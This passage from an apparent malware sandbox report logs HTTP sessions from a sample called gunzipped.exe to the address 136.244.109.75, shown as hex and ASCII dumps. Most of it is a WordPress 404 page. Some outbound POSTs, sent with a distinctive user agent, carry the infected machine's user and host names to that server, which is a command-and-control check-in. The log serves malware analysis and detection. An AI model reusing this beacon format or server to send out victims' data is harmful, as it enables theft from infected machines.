68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:12.751811028 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:12.751847982 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:12.751885891 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:12.751926899 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:12.751965046 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:12.752003908 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:12.752043009 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:12.752079964 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:12.752156019 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49767	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:13.442137957 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:13.653587103 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:14.572911024 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:13 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:14.573026896 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:14.573067904 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:14.573106050 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:14.573148966 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:14.573187113 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:14.573226929 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:14.573266029 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:14.573302984 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:14.573348045 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49768	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:14.912121058 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:15.116725922 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:16.038089991 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:14 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = 